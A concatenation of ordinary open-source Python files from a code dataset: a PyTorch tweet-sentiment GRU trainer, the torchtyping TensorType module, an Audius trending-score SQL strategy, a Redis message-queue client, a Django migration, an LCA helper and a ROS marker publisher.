EPOCH = 250 # With epoch 0, we will run until interrupted
LR = 1e-4 # LR 1e-4 seems to give stable learning without big oscillation
CONTINUE = True # Attempts to continue from previous checkpoint
DEBUG = False
CUDA = True
TEST_WITH_VALIDATION = False # Only test with validation data
DATA_SLICE = 40000
CHECKPOINT_PATH = op.join(op.dirname(__file__), "..", "..", "checkpoint.pt")
MODEL_PATH = op.join(op.dirname(__file__), "..", "..", "model.pt")
def parseFromSemEval(file):
# TODO Move to utils
# TODO Remove dependency on Pandas
import pandas
f = pandas.read_csv(file, sep=",", encoding="utf-8", index_col=0)
return f[["text", "semantic"]].as_matrix()
def _convert_with_vocab(data, vocab_table):
# Convert according to VOCAB
# TODO Might not work if shape is only 1-d.
CONVERTED = np.zeros((data.shape[0], 140))
for i in range(data.shape[0]):
txt = data[i,0]
for j in range(min(len(txt), 140)):
try:
CONVERTED[i,j] = vocab_table[txt[j]]
except KeyError:
# Keep as 0
pass
return CONVERTED
def _loadSemEvalData(fname):
"""
Load data from predefined SemEval sources.
Returns: (Training-data, Training-labels, Validation-data, Validation-labels)
"""
DATADIR = op.join(op.dirname(__file__), "..", "..", "data")
# Test if files exist
if not op.exists(fname):
# Check alternative path
if not op.exists(op.join(DATADIR, fname)):
print("Could not find {} file. Please run download_data.py from data directory".format(op.join(DATADIR, fname)))
return 0
else:
fname = op.join(DATADIR, fname)
data = parseFromSemEval(fname)
return data
def _loadCharacterEmbedding():
"""
Load character-embedding indexes.
Returns: dict(character, index)
"""
# Path to unpacked file
# TODO For packaging use path to site
VOCAB = op.join(op.dirname(__file__), "..", "..", "assets", "embeddings", "reactionrnn_vocab.json")
if not op.exists(VOCAB):
print("Fatal error")
print("Could not find {} file. Has it been deleted?\nCan be downloaded from https://github.com/Manezki/TwitMine/blob/master/assets/embeddings/reactionrnn_vocab.json".format(VOCAB))
sys.exit(-1)
CONVERT_TABLE = json.load(open(VOCAB))
return CONVERT_TABLE
def batch(tensor, batch_size):
# TODO Move to utils
# TODO Change to be more concervative with memory
tensor_list = []
length = tensor.shape[0]
i = 0
while True:
if (i+1) * batch_size >= length:
tensor_list.append(tensor[i * batch_size: length])
return tensor_list
tensor_list.append(tensor[i * batch_size: (i+1) * batch_size])
i += 1
def save_checkpoint(state, is_best, filename=CHECKPOINT_PATH):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, MODEL_PATH)
def plot_progress(training, validation, loss=False):
# TODO move to utils
# BUG argmin line is skewed, x-points wrong?
xaxis = np.linspace(1, 1+len(training), num=len(training))
pl1 = pyplot.plot(xaxis, training, color='orange')
pl2 = pyplot.plot(xaxis, validation, color='blue')
if not loss:
pyplot.title("Training vs Validation accuracy")
pyplot.xlabel("Epoch")
pyplot.ylabel("Accuracy (%)")
orange = patches.Patch(color='orange', label="Training accuracy")
blue = patches.Patch(color='blue', label="Validation accuracy")
else:
minIdx = np.argmin(validation)
miny = np.min(training)
pyplot.plot([minIdx, minIdx+1], [miny, validation[minIdx]], color="red")
pyplot.title("Training vs Validation loss")
pyplot.xlabel("Epoch")
pyplot.ylabel("Loss")
orange = patches.Patch(color='orange', label="Training loss")
blue = patches.Patch(color='blue', label="Validation loss")
pyplot.legend(handles=[orange, blue])
pyplot.show()
class Estimator(object):
## Based on woderfull Gist https://gist.github.com/kenzotakahashi/ed9631f151710c6bd898499fcf938425
def __init__(self, model):
self.model = model
def compile(self, optimizer, loss):
self.optimizer = optimizer
self.loss_f = loss
def _fit(self, X_list, y_list):
"""
train one epoch
"""
loss_list = []
acc_list = []
for X, y in zip(X_list, y_list):
if CUDA:
X_v = Variable(torch.from_numpy(X).long(), requires_grad=False).cuda()
y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False).cuda()
init_hidden = self.model.initHidden(X.shape[0], 100).cuda()
else:
X_v = Variable(torch.from_numpy(X).long(), requires_grad=False)
y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False)
init_hidden = self.model.initHidden(X.shape[0], 100)
self.optimizer.zero_grad()
# Original y_pred = self.model(X, self.model.initHidden(X.size()[1]))
# Init hidden 100, as we perform embedding in the GRU
y_pred, hidden = self.model(X_v, init_hidden)
loss = self.loss_f(y_pred, y_v)
loss.backward()
self.optimizer.step()
## for log
loss_list.append(loss.data[0])
classes = torch.topk(y_pred, 1)[1].cpu().data.numpy().flatten()
#comp = np.hstack((classes.reshape(-1,1), (y+1).reshape(-1,1)))
#print(comp)
acc = self._accuracy(classes, y+1)
acc_list.append(acc)
return sum(loss_list) / len(loss_list), sum(acc_list) / len(acc_list)
def fit(self, X, y, batch_size=32, nb_epoch=10, validation_data=()):
# TODO keep track of the best model state and return it when finished
X_list = batch(X, batch_size)
y_list = batch(y, batch_size)
self.training_cost = []
self.training_acc = []
self.validation_cost = []
self.validation_acc = []
for t in range(1, nb_epoch + 1):
loss, acc = self._fit(X_list, y_list)
self.training_cost.append(loss)
self.training_acc.append(acc)
val_log = ''
if validation_data:
val_loss, val_acc = self.evaluate(validation_data[0], validation_data[1], batch_size)
val_log = "- val_loss: %06.4f - val_acc: %06.4f" % (val_loss, val_acc)
self.validation_cost.append(val_loss)
self.validation_acc.append(val_acc)
print("Epoch %s/%s loss: %06.4f - acc: %06.4f %s" % (t, nb_epoch, loss, acc, val_log))
def evaluate(self, X, y, batch_size=32):
y_pred, hidden = self.predict(X)
if CUDA:
y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False).cuda()
else:
y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False)
loss = self.loss_f(y_pred, y_v)
classes = torch.topk(y_pred, 1)[1].cpu().data.numpy().flatten()
acc = self._accuracy(classes, y+1)
_, gt = np.unique(y + 1, return_counts=True)
gt = gt.astype(float) / len(y)
_, pr = np.unique(classes, return_counts=True)
pr = pr.astype(float) / len(y)
if len(gt) == 3 and len(pr) == 3:
print("Distribution Grund truth: NEG {}, NEU {}, POS {}".format(gt[0], gt[1], gt[2]))
print("Distribution predictions: NEG {}, NEU {}, POS {}".format(pr[0], pr[1], pr[2]))
return loss.data[0], acc
def _accuracy(self, y_pred, y):
return sum(y_pred == y) / y.shape[0]
def predict(self, X):
if CUDA:
X = Variable(torch.from_numpy(X).long()).cuda()
init_hidden = self.model.initHidden(X.shape[0], 100).cuda()
else:
X = Variable(torch.from_numpy(X).long())
init_hidden = self.model.initHidden(X.shape[0], 100)
y_pred = self.model(X, init_hidden)
return y_pred
def predict_classes(self, X):
return torch.topk(self.predict(X), 1)[1].cpu().data.numpy().flatten()
#############
class RNN(nn.Module):
def __init__(self, input_size, embed_size, hidden_size, output_size, state_dict=None, dict_path=None):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.embed = nn.Embedding(401,embed_size, padding_idx=0)
self.rnn = nn.GRU(embed_size, hidden_size, bias=True, dropout=0.5)
self.output = nn.Linear(hidden_size, output_size)
self._create_weight_tensors(input_size, hidden_size, output_size)
if state_dict is not None:
self._load_weights(state_dict)
else:
self._init_weights(nn.init.kaiming_normal)
self.softmax = nn.LogSoftmax(dim=1)
def _load_weights(self, state_dict):
pretrained = torch.load(state_dict)
self.load_state_dict(pretrained['state_dict'])
def _create_weight_tensors(self, input_size, hidden_size, output_size):
self.embed.weight = nn.Parameter(torch.zeros(401, 100))
self.rnn.weight_ih = nn.Parameter(torch.zeros(3*hidden_size, 100))
self.rnn.weight_hh = nn.Parameter(torch.zeros(3*hidden_size, hidden_size))
self.rnn.bias_ih = nn.Parameter(torch.zeros(3*hidden_size))
self.rnn.bias_hh = nn.Parameter(torch.zeros(3*hidden_size))
self.output.weight = nn.Parameter(torch.zeros(3, 256))
self.output.bias_ih = nn.Parameter(torch.zeros(3, 256))
def _init_weights(self, method):
method(self.embed.weight)
method(self.rnn.weight_ih)
method(self.rnn.weight_hh)
method(self.output.weight)
# Bias already 0s
def forward(self, input, hidden):
embedded = self.embed(input)
embedded.transpose_(0,1)
out, hidden = self.rnn(embedded, hidden)
lin = F.relu(self.output(out[MAX_LEN-1,:,:]))
return lin, hidden
def initHidden(self, batch_size, input_size):
return Variable(torch.zeros(1, batch_size, self.hidden_size))
def main():
training = _loadSemEvalData("dataset_training.csv")
validation = _loadSemEvalData("dataset_validation.csv")
# This line prevents running if the data was not loaded, refrase the check for more specific use.
# Training and Validation should be int only when bad loading
if isinstance(training, int) and isinstance(validation, int):
sys.exit(-1)
# If DATASLICE is smaller than data amount, take a subset.
training = training[:DATA_SLICE, :]
validation = validation[:DATA_SLICE, :]
# Convert text column to embedding indexes
CONVERT_TABLE = _loadCharacterEmbedding()
training_data = _convert_with_vocab(training, CONVERT_TABLE)
validation_data = _convert_with_vocab(validation, CONVERT_TABLE)
training_labels = training[:, 1].astype(int)
validation_labels = validation[:, 1].astype(int)
# Split the training data to test and training set.
# Holdout-method is used, and no further cross validation is performed.
# TODO Change naming convention from Training, test, validation(unseen data) to Training, validation, test
X_train = training_data[:int(training_data.shape[0]*0.8), :]
X_test = training_data[int(training_data.shape[0]*0.8):, :]
y_train = training_labels[:int(training_labels.shape[0]*0.8)]
y_test = training_labels[int(training_labels.shape[0]*0.8):]
epoch = 0
best_prec = 0.0
training_cost = []
training_acc = []
validation_cost = []
validation_acc = []
model = RNN(140, 100, 256, 3, state_dict=op.join(op.dirname(__file__), "..", "..", "assets", "weights", "RNN.pt"))
if torch.cuda.is_available() and CUDA:
model.cuda()
criterion = nn.CrossEntropyLoss().cuda()
else:
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=LR)
if op.exists(MODEL_PATH) and CONTINUE:
# TODO, cannot continue if was trained on CPU and continues on GPU and vice versa
print("Continuying with the previous model")
checkpoint = torch.load(MODEL_PATH)
epoch = checkpoint["epoch"]
best_prec = checkpoint["best_prec"]
optimizer.load_state_dict(checkpoint["optimizer"])
for paramGroup in optimizer.param_groups:
paramGroup['lr'] = LR
training_cost = checkpoint["train_cost"]
training_acc = checkpoint["train_hist"]
validation_cost = checkpoint['valid_cost']
validation_acc = checkpoint["valid_hist"]
print("=> loaded checkpoint (epoch {})"
.format(checkpoint['epoch']))
print(model)
def fit_and_log(epoch):
clf.fit(X_train, y_train, batch_size=BATCH_SIZE, nb_epoch=epoch,
validation_data=(X_test, y_test))
[training_cost.append(i) for i in clf.training_cost]
[training_acc.append(i) for i in clf.training_acc]
[validation_acc.append(i) for i in clf.validation_acc]
[validation_cost.append(i) for i in clf.validation_cost]
clf = Estimator(model)
clf.compile(optimizer,
loss=nn.CrossEntropyLoss())
#loss=nn.CrossEntropyLoss(weight=torch.cuda.FloatTensor([2,1,1.5])))
if TEST_WITH_VALIDATION:
_, VAL_ACC = clf.evaluate(validation_data, validation_labels, BATCH_SIZE)
print("Validation accuracy on the unseen validation data {}".format(VAL_ACC))
plot_progress(training_acc, validation_acc)
plot_progress(training_cost, validation_cost, loss=True)
return -1
try:
if EPOCH == 0:
c = 0
while True:
# TODO only saves after finished, should keep tract of the best weights.
print("Training epoch: {} from current run".format(c))
fit_and_log(1)
c+=1
epoch += 1
else:
fit_and_log(EPOCH)
epoch += EPOCH
except (KeyboardInterrupt, SystemExit):
# Save the model
if len(validation_acc) != 0:
is_best = validation_acc[-1] > best_prec
best_prec = max(validation_acc[-1], best_prec)
save_checkpoint({
'epoch': epoch,
'state_dict': model.state_dict(),
'best_prec': best_prec,
'optimizer': optimizer.state_dict(),
'train_cost': training_cost,
'train_hist': training_acc,
'valid_cost': valid_cost,
'valid_hist': validation_acc
}, is_best)
print("Saved model after interrupt")
raise
score, acc = clf.evaluate(X_test, y_test)
print('Test score:', score)
print('Test accuracy:', acc)
# Save the model
is_best = acc > best_prec
best_prec = max(acc, best_prec)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'best_prec': best_prec,
'optimizer': optimizer.state_dict(),
'train_cost': training_cost,
'train_hist': training_acc,
'valid_cost': validation_cost,
'valid_hist': validation_acc
}, is_best)
_, VAL_ACC = clf.evaluate(validation_data, validation_labels, BATCH_SIZE)
print("Validation accuracy on the unseen validation data {}".format(VAL_ACC))
plot_progress(training_acc, validation_acc)
plot_progress(training_cost, validation_cost, loss=True)
if __name__ == "__main__":
main() | 2.3125 | 2 |
torchtyping/tensor_type.py | AdilZouitine/torchtyping | 1 | 12760323 | <filename>torchtyping/tensor_type.py
from __future__ import annotations
import sys
import torch
from .tensor_details import (
_Dim,
_no_name,
is_named,
DtypeDetail,
LayoutDetail,
ShapeDetail,
TensorDetail,
)
from .utils import frozendict
from typing import Any, NoReturn
# Annotated is available in python version 3.9 (PEP 593)
if sys.version_info >= (3, 9):
from typing import Annotated
else:
# Else python version is lower than 3.9
# we import Annotated from typing_annotations
from typing_extensions import Annotated
# Not Type[Annotated...] as we want to use this in instance checks.
_AnnotatedType = type(Annotated[torch.Tensor, ...])
# For use when we have a plain TensorType, without any [].
class _TensorTypeMeta(type):
def __instancecheck__(cls, obj: Any) -> bool:
return isinstance(obj, cls.base_cls)
class TensorType(metaclass=_TensorTypeMeta):
base_cls = torch.Tensor
def __new__(cls, *args, **kwargs) -> NoReturn:
raise RuntimeError(f"Class {cls.__name__} cannot be instantiated.")
@staticmethod
def _type_error(item: Any) -> NoReturn:
raise TypeError(f"{item} not a valid type argument.")
@classmethod
def _convert_shape_element(cls, item_i: Any) -> _Dim:
if isinstance(item_i, int) and not isinstance(item_i, bool):
return _Dim(name=_no_name, size=item_i)
elif isinstance(item_i, str):
return _Dim(name=item_i, size=-1)
elif item_i is None:
return _Dim(name=None, size=-1)
elif isinstance(item_i, slice):
if item_i.step is not None:
cls._type_error(item_i)
if item_i.start is not None and not isinstance(item_i.start, str):
cls._type_error(item_i)
if item_i.stop is not ... and not isinstance(item_i.stop, int):
cls._type_error(item_i)
if item_i.start is None and item_i.stop is ...:
cls._type_error(item_i)
return _Dim(name=item_i.start, size=item_i.stop)
elif item_i is ...:
return _Dim(name=_no_name, size=...)
elif item_i is Any:
return _Dim(name=_no_name, size=-1)
else:
cls._type_error(item_i)
@staticmethod
def _convert_dtype_element(item_i: Any) -> torch.dtype:
if item_i is int:
return torch.long
elif item_i is float:
return torch.get_default_dtype()
elif item_i is bool:
return torch.bool
else:
return item_i
def __class_getitem__(cls, item: Any) -> _AnnotatedType:
if isinstance(item, tuple):
if len(item) == 0:
item = ((),)
else:
item = (item,)
scalar_shape = False
not_ellipsis = False
not_named_ellipsis = False
check_names = False
dims = []
dtypes = []
layouts = []
details = []
for item_i in item:
if isinstance(item_i, (int, str, slice)) or item_i in (None, ..., Any):
item_i = cls._convert_shape_element(item_i)
if item_i.size is ...:
# Supporting an arbitrary number of Ellipsis in arbitrary
# locations feels concerningly close to writing a regex
# parser and I definitely don't have time for that.
if not_ellipsis:
raise NotImplementedError(
"Having dimensions to the left of `...` is not currently "
"supported."
)
if item_i.name is None:
if not_named_ellipsis:
raise NotImplementedError(
"Having named `...` to the left of unnamed `...` is "
"not currently supported."
)
else:
not_named_ellipsis = True
else:
not_ellipsis = True
dims.append(item_i)
elif isinstance(item_i, tuple):
if len(item_i) == 0:
scalar_shape = True
else:
cls._type_error(item_i)
elif item_i in (int, bool, float) or isinstance(item_i, torch.dtype):
dtypes.append(cls._convert_dtype_element(item_i))
elif isinstance(item_i, torch.layout):
layouts.append(item_i)
elif item_i is is_named:
check_names = True
elif isinstance(item_i, TensorDetail):
details.append(item_i)
else:
cls._type_error(item_i)
if scalar_shape:
if len(dims) != 0:
cls._type_error(item)
else:
if len(dims) == 0:
dims = None
pre_details = []
if dims is not None:
pre_details.append(ShapeDetail(dims=dims, check_names=check_names))
if len(dtypes) == 0:
pass
elif len(dtypes) == 1:
pre_details.append(DtypeDetail(dtype=dtypes[0]))
else:
raise TypeError("Cannot have multiple dtypes.")
if len(layouts) == 0:
pass
elif len(layouts) == 1:
pre_details.append(LayoutDetail(layout=layouts[0]))
else:
raise TypeError("Cannot have multiple layouts.")
details = tuple(pre_details + details)
assert len(details) > 0
# Frozen dict needed for Union[TensorType[...], ...], as Union hashes its
# arguments.
return Annotated[
cls.base_cls,
frozendict(
{"__torchtyping__": True, "details": details, "cls_name": cls.__name__}
),
]
| 2.21875 | 2 |
discovery-provider/src/trending_strategies/ML51L_trending_tracks_strategy.py | RahulBansal123/audius-protocol | 0 | 12760324 | import logging
import time
from datetime import datetime
from dateutil.parser import parse
from sqlalchemy.sql import text
from src.trending_strategies.base_trending_strategy import BaseTrendingStrategy
from src.trending_strategies.trending_type_and_version import (
TrendingType,
TrendingVersion,
)
logger = logging.getLogger(__name__)
# Trending Parameters
N = 1
a = max
M = pow
F = 50
O = 1
R = 0.25
i = 0.01
q = 100000.0
T = {"day": 1, "week": 7, "month": 30, "year": 365, "allTime": 100000}
y = 3
def z(time, track):
# pylint: disable=W,C,R
E = track["listens"]
e = track["windowed_repost_count"]
t = track["repost_count"]
x = track["windowed_save_count"]
A = track["save_count"]
o = track["created_at"]
l = track["owner_follower_count"]
j = track["karma"]
if l < y:
return {"score": 0, **track}
H = (N * E + F * e + O * x + R * t + i * A) * j
L = T[time]
K = datetime.now()
w = parse(o)
k = (K - w).days
Q = 1
if k > L:
Q = a((1.0 / q), (M(q, (1 - k / L))))
return {"score": H * Q, **track}
class TrendingTracksStrategyML51L(BaseTrendingStrategy):
def __init__(self):
super().__init__(TrendingType.TRACKS, TrendingVersion.ML51L, True)
def get_track_score(self, time_range, track):
logger.error(
f"get_track_score not implemented for Trending Tracks Strategy with version {TrendingVersion.ML51L}"
)
def update_track_score_query(self, session):
start_time = time.time()
trending_track_query = text(
"""
begin;
DELETE FROM track_trending_scores WHERE type=:type AND version=:version;
INSERT INTO track_trending_scores
(track_id, genre, type, version, time_range, score, created_at)
select
tp.track_id,
tp.genre,
:type,
:version,
:week_time_range,
CASE
WHEN tp.owner_follower_count < :y
THEN 0
WHEN EXTRACT(DAYS from now() - aip.created_at) > :week
THEN greatest(1.0/:q, pow(:q, greatest(-10, 1.0 - 1.0*EXTRACT(DAYS from now() - aip.created_at)/:week))) * (:N * aip.week_listen_counts + :F * tp.repost_week_count + :O * tp.save_week_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
ELSE (:N * aip.week_listen_counts + :F * tp.repost_week_count + :O * tp.save_week_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
END as week_score,
now()
from trending_params tp
inner join aggregate_interval_plays aip
on tp.track_id = aip.track_id;
INSERT INTO track_trending_scores
(track_id, genre, type, version, time_range, score, created_at)
select
tp.track_id,
tp.genre,
:type,
:version,
:month_time_range,
CASE
WHEN tp.owner_follower_count < :y
THEN 0
WHEN EXTRACT(DAYS from now() - aip.created_at) > :month
THEN greatest(1.0/:q, pow(:q, greatest(-10, 1.0 - 1.0*EXTRACT(DAYS from now() - aip.created_at)/:month))) * (:N * aip.month_listen_counts + :F * tp.repost_month_count + :O * tp.save_month_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
ELSE (:N * aip.month_listen_counts + :F * tp.repost_month_count + :O * tp.save_month_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
END as month_score,
now()
from trending_params tp
inner join aggregate_interval_plays aip
on tp.track_id = aip.track_id;
INSERT INTO track_trending_scores
(track_id, genre, type, version, time_range, score, created_at)
select
tp.track_id,
tp.genre,
:type,
:version,
:all_time_time_range,
CASE
WHEN tp.owner_follower_count < :y
THEN 0
ELSE (:N * ap.count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
END as all_time_score,
now()
from trending_params tp
inner join aggregate_plays ap
on tp.track_id = ap.play_item_id
inner join tracks t
on ap.play_item_id = t.track_id
where -- same filtering for aggregate_interval_plays
t.is_current is True AND
t.is_delete is False AND
t.is_unlisted is False AND
t.stem_of is Null;
commit;
"""
)
session.execute(
trending_track_query,
{
"week": T["week"],
"month": T["month"],
"N": N,
"F": F,
"O": O,
"R": R,
"i": i,
"q": q,
"y": y,
"type": self.trending_type.name,
"version": self.version.name,
"week_time_range": "week",
"month_time_range": "month",
"all_time_time_range": "allTime",
},
)
duration = time.time() - start_time
logger.info(
f"trending_tracks_strategy | Finished calculating trending scores in {duration} seconds",
extra={
"id": "trending_strategy",
"type": self.trending_type.name,
"version": self.version.name,
"duration": duration,
},
)
def get_score_params(self):
return {"xf": True, "pt": 0, "nm": 5}
| 2.234375 | 2 |
src/rsmq/rsmq.py | ChuckHend/PyRSMQ | 30 | 12760325 | <reponame>ChuckHend/PyRSMQ<filename>src/rsmq/rsmq.py
'''
Python Redis Simple Queue Manager
'''
from redis import Redis
from . import const
from .cmd import ChangeMessageVisibilityCommand
from .cmd import CreateQueueCommand, DeleteQueueCommand, ListQueuesCommand
from .cmd import DeleteMessageCommand
from .cmd import SendMessageCommand, ReceiveMessageCommand, PopMessageCommand
from .cmd import SetQueueAttributesCommand, GetQueueAttributesCommand
DEFAULT_REDIS_OPTIONS = {
'encoding': 'utf-8',
'decode_responses': True
}
DEFAULT_OPTIONS = {
'ns': 'rsmq',
'realtime': False,
'exceptions': True
}
class RedisSMQ():
'''
Redis Simple Message Queue implementation in Python
'''
def __init__(self, client=None, host="127.0.0.1", port="6379", options=None, **kwargs):
'''
Constructor:
@param client: if provided, redis client object to use
@param host: if client is not provided, redis hostname
@param port: if client is not provided, redis port
@param options: if client is not provided, additional options for redis client creation
Additional arguments:
@param ns: namespace
@param realtime: if true, use realtime comms (pubsub)(default is False)
@param exceptions: if true, throw exceptions on errors, else return False(default is True)
Remaining params are automatically passed to commands
'''
# redis_client
self._client = client
# Redis Options
self.redis_options = dict(DEFAULT_REDIS_OPTIONS)
self.redis_options['host'] = host
self.redis_options['port'] = port
if options:
self.redis_options.update(options)
# RSMQ global options
self.options = dict(DEFAULT_OPTIONS)
to_remove = []
for param, value in kwargs.items():
if param in self.options:
self.options[param] = kwargs[param]
to_remove.append(param)
elif value is None:
# Remove default set to None
to_remove.append(param)
# Remove unnecessary kwargs
for param in to_remove:
del kwargs[param]
# Everything else is passed through to commands
self._default_params = kwargs
self._popMessageSha1 = None
self._receiveMessageSha1 = None
self._changeMessageVisibilitySha1 = None
@property
def popMessageSha1(self):
''' Get Pop Message Script SHA1 '''
if self._popMessageSha1 is None:
client = self.client
self._popMessageSha1 = client.script_load(const.SCRIPT_POPMESSAGE)
return self._popMessageSha1
@property
def receiveMessageSha1(self):
''' Get Received Message Script SHA1 '''
if self._receiveMessageSha1 is None:
client = self.client
self._receiveMessageSha1 = client.script_load(
const.SCRIPT_RECEIVEMESSAGE)
return self._receiveMessageSha1
@property
def changeMessageVisibilitySha1(self):
''' Get Change Message Visibilities Script SHA1 '''
if self._changeMessageVisibilitySha1 is None:
client = self.client
self._changeMessageVisibilitySha1 = client.script_load(
const.SCRIPT_CHANGEMESSAGEVISIBILITY)
return self._changeMessageVisibilitySha1
@property
def client(self):
''' get Redis client. Create one if one does not exist '''
if not self._client:
self._client = Redis(**self.redis_options)
return self._client
def exceptions(self, enabled=True):
''' Set global exceptions flag '''
self.options['exceptions'] = enabled == True
return self
def setClient(self, client):
''' Set Redis Client '''
self._client = client
return self
def _command(self, command, **kwargs):
''' Run command '''
args = dict(self._default_params)
args.update(kwargs)
return command(self, **args)
def createQueue(self, **kwargs):
''' Create Queue '''
return self._command(CreateQueueCommand, **kwargs)
def deleteQueue(self, **kwargs):
''' Create Queue '''
return self._command(DeleteQueueCommand, **kwargs)
def setQueueAttributes(self, **kwargs):
''' setQueueAttributesCommand() '''
return self._command(SetQueueAttributesCommand, **kwargs)
def getQueueAttributes(self, **kwargs):
''' getQueueAttributesCommand() '''
return self._command(GetQueueAttributesCommand, **kwargs)
def listQueues(self, **kwargs):
''' List Queues '''
return self._command(ListQueuesCommand, **kwargs)
def changeMessageVisibility(self, **kwargs):
''' ChangeMessageVisibilityCommand '''
return self._command(ChangeMessageVisibilityCommand, **kwargs)
def sendMessage(self, **kwargs):
''' Send Message Command '''
return self._command(SendMessageCommand, **kwargs)
def receiveMessage(self, **kwargs):
''' Receive Message Command '''
return self._command(ReceiveMessageCommand, **kwargs)
def popMessage(self, **kwargs):
''' Pop Message Command '''
return self._command(PopMessageCommand, **kwargs)
def deleteMessage(self, **kwargs):
''' Delete Message Command '''
return self._command(DeleteMessageCommand, **kwargs)
def quit(self):
''' Quit - here for compatibility purposes '''
self._client = None
| 2.265625 | 2 |
mud/migrations/0020_remove_users_loggedin.py | cspt2-build-week-abr/Backend | 0 | 12760326 | # Generated by Django 2.2.3 on 2019-07-22 02:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mud', '0019_users_loggedin'),
]
operations = [
migrations.RemoveField(
model_name='users',
name='loggedIn',
),
]
| 1.453125 | 1 |
bw_default_backend/calculation_package.py | brightway-lca/bw_default_backend | 0 | 12760327 | <reponame>brightway-lca/bw_default_backend
from . import config, Collection, Method, Flow
from .errors import MissingFlow
from peewee import DoesNotExist
import json
def prepare_calculation_package(functional_unit, methods=None, as_file=False, **kwargs):
"""Prepare calculation package for use in `bw_calc`.
The format for calculation packages is specified in more detail in the documentation.
Args:
functional_unit: A dictionary defining the functional unit of
calculation. Keys can be either ``Flow`` instances or integer ids;
values should be the amount of the respective flow.
methods: An optional list of methods (either ``Method`` instances or
integer ids)
as_file: Boolean to return package as a JSON filepath instead of a dict
kwargs: Any additional arguments to add, such as RNG seed
Returns:
Either a Python dict, or a JSON filepath (if ``as_file``).
Raises:
MissingFlow: The given functional unit is missing in this database
ValueError: Can't understand given functional unit
"""
as_id = {x.id if isinstance(x, Flow) else x}
fu = {as_id(key): value for key, value in functional_unit.items()}
if not all(isinstance(x, int) for x in fu):
raise ValueError("Can't understand functional unit")
try:
collections = set.union(
*[Flow.get(id=key).collection.recursive_dependents() for key in fu]
)
except DoesNotExist:
raise MissingFlow(
"One or more flows in the functional unit aren't present in the database"
)
| 2.65625 | 3 |
uuv_simulator/uuv_control/uuv_control_utils/scripts/trajectory_marker_publisher.py | laughlinbarker/underice_ekf | 1 | 12760328 | #!/usr/bin/env python
# Copyright (c) 2016 The UUV Simulator Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import os
import yaml
from datetime import datetime
from std_msgs.msg import Bool
from nav_msgs.msg import Path
from visualization_msgs.msg import MarkerArray, Marker
from geometry_msgs.msg import PoseStamped, Point, Quaternion
from uuv_control_msgs.msg import Trajectory, TrajectoryPoint, WaypointSet
import uuv_trajectory_generator
class TrajectoryMarkerPublisher:
def __init__(self):
self._trajectory_sub = rospy.Subscriber(
'trajectory', Trajectory, self._update_trajectory)
self._waypoints_sub = rospy.Subscriber(
'waypoints', WaypointSet, self._update_waypoints)
# Vehicle state flags
self._is_auto_on = False
self._is_traj_tracking_on = False
self._is_station_keeping_on = False
self._automatic_mode_sub = rospy.Subscriber(
'automatic_on', Bool, self._update_auto_mode)
self._traj_tracking_mode_sub = rospy.Subscriber(
'trajectory_tracking_on', Bool, self._update_traj_tracking_mode)
self._station_keeping_mode_sub = rospy.Subscriber(
'station_keeping_on', Bool, self._update_station_keeping_mode)
# Waypoint set received
self._waypoints = None
# Trajectory received
self._trajectory = None
self._output_dir = None
if rospy.has_param('~output_dir'):
self._output_dir = rospy.get_param('~output_dir')
if not os.path.isdir(self._output_dir):
print 'Invalid output directory, not saving the files, dir=', self._output_dir
self._output_dir = None
else:
self._output_dir = os.path.join(self._output_dir, rospy.get_namespace().replace('/', ''))
if not os.path.isdir(self._output_dir):
os.makedirs(self._output_dir)
# Visual marker publishers
self._trajectory_path_pub = rospy.Publisher(
'trajectory_marker', Path, queue_size=1)
self._waypoint_markers_pub = rospy.Publisher(
'waypoint_markers', MarkerArray, queue_size=1)
self._waypoint_path_pub = rospy.Publisher(
'waypoint_path_marker', Path, queue_size=1)
self._update_markers_timer = rospy.Timer(
rospy.Duration(0.5), self._update_markers)
def _update_markers(self, event):
if self._waypoints is None:
waypoint_path_marker = Path()
t = rospy.Time.now()
waypoint_path_marker.header.stamp = t
waypoint_path_marker.header.frame_id = 'world'
waypoint_marker = MarkerArray()
marker = Marker()
marker.header.stamp = t
marker.header.frame_id = 'world'
marker.id = 0
marker.type = Marker.SPHERE
marker.action = 3
else:
waypoint_path_marker = self._waypoints.to_path_marker()
waypoint_marker = self._waypoints.to_marker_list()
self._waypoint_path_pub.publish(waypoint_path_marker)
self._waypoint_markers_pub.publish(waypoint_marker)
traj_marker = Path()
traj_marker.header.stamp = rospy.Time.now()
traj_marker.header.frame_id = 'world'
if self._trajectory is not None:
for pnt in self._trajectory.points:
p_msg = PoseStamped()
p_msg.header.stamp = pnt.header.stamp
p_msg.pose = pnt.pose
traj_marker.poses.append(p_msg)
self._trajectory_path_pub.publish(traj_marker)
return True
def _update_trajectory(self, msg):
self._trajectory = msg
def _update_waypoints(self, msg):
self._waypoints = uuv_trajectory_generator.WaypointSet()
self._waypoints.from_message(msg)
def _update_auto_mode(self, msg):
self._is_auto_on = msg.data
def _update_station_keeping_mode(self, msg):
self._is_station_keeping_on = msg.data
def _update_traj_tracking_mode(self, msg):
self._is_traj_tracking_on = msg.data
if __name__ == '__main__':
print('Starting trajectory and waypoint marker publisher')
rospy.init_node('trajectory_marker_publisher')
try:
node = TrajectoryMarkerPublisher()
rospy.spin()
except rospy.ROSInterruptException:
print('caught exception')
print('exiting')
| 1.898438 | 2 |
interactive_map_tester/interactive_map_tester/pointGroup.py | antonikaras/thesis_ros2 | 1 | 12760329 | # Python related libraries
